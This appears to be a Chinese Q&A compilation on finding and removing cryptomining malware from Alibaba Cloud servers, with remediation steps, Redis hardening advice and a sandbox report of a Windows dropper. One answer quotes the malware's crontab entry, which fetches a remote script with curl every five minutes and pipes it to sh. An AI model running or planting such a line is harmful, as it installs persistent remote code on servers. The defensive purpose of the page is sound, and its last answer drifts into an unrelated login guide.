阿里雲ecs遇到挖礦進程

❶ 阿里雲ECS伺服器對外攻擊，怎麼解決

伺服器被黑了，保存數據，重做系統。伺服器

❷ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

❸ 阿里雲伺服器ECS CPU老是被一個程序占滿100%

是一個mc-serv生成的病毒文件，

風險簡述 高危
安裝windows自啟動項
運行信息 Windows XP SP3 + PDF11
可疑行為特徵
[-]安裝windows自啟動項(1)
[-]file
"C:\\WINDOWS\\win.ini"
進程樹

.exe

文件釋放
[+]libeay32.dll
[+]zlib1.dll
[+]libwinpthread-1.dll
[+]mscl.exe
[+]ssleay32.dll
[+]libcurl-4.dll
[+]__tmp_rar_sfx_access_check_35958766
行為細節
[-].exe(當前進程號:1984，父進程號:1060)(1630)
[+]系統函數調用
[+]進程函數調用
[+]注冊表函數調用
[+]文件函數調用
[+]其它函數調用

❹ 阿里雲允許用雲主機挖礦嗎

VPS提供商一般都不允許雲主機進行挖礦，一旦發現就會被封禁，而且本來就對挖礦進行了限制，本身你就無法使用雲主機進行挖礦，而且性能也達不到挖礦的標准。

❺ 阿里雲ECS伺服器CPU佔用較高時，該如何處理

這種情況可以考慮是被挖礦了，可以找到雲市場雲頂雲尋求幫助，一般這種情況會讓工程師進行排查找出問題所在，然後再進行修理，大概的時間一般是三天以內

❻ 阿里雲centos 被門羅幣病毒入侵了，netstat -anp找不到進程號，如何結束進程，但不能重啟伺服器

ps aux看進程號，根據進程號找到病毒文件位置，先不要刪除，先看下crontab -e，是否有異常任務，再看下自己家目錄下是否有異常文件或者改動，還有就是開機啟動文件是否有寫過任務。。。。如果你不是很懂linux系統的話，建議備份數據重裝吧（小心偽裝成數據文件）。因為刪除起來確實很麻煩，我刪了一下午才搞定

❼ windows伺服器的挖礦進程怎麼關閉刪除

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後，使用裡面的病毒查殺功能，直接就可以查殺這種電腦病毒了

❽ 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的，因為沒有解決好漏洞。
建議是重做系統，然後找護衛神給你做一下系統安全加固，把漏洞徹底堵住才有效果。

❾ 9696.exe是什麼文件

對於這個進程你可以使用360安全衛士主界面的更多里邊的360任務管理器來查看它是哪個軟體的，如果覺得有問題可以在安全模式下來殺毒看看。

❿ 阿里雲ecs伺服器進程異常行為windows異常帳號創建要怎麼解決

小鳥雲伺服器niaoyun實例創建好之後，您可以使用以下任意一種方式登錄伺服器：

遠程桌面連接(,MSTSC)：採用這種方式登錄，請確保實例能訪問公網。如果在創建實例時沒有購買帶寬，則不能使用遠程桌面連接。

管理終端VNC：無論您在創建實例時是否購買了帶寬，只要您本地有網頁瀏覽器，都可以通過管理控制台的管理終端登錄實例。

使用遠程桌面連接(MSTSC)登錄實例

打開開始菜單>遠程桌面連接，或在開始菜單>搜索中輸入mstsc。也可以使用快捷鍵Win+R來啟動運行窗口，輸入mstsc後回車啟動遠程桌面連接。

在遠程桌面連接對話框中，輸入實例的公網IP地址。單擊顯示選項。

輸入用戶名，如小鳥雲默認為niaoyun。單擊允許我保存憑據，然後單擊連接。這樣以後登錄就不需要手動輸入密碼了。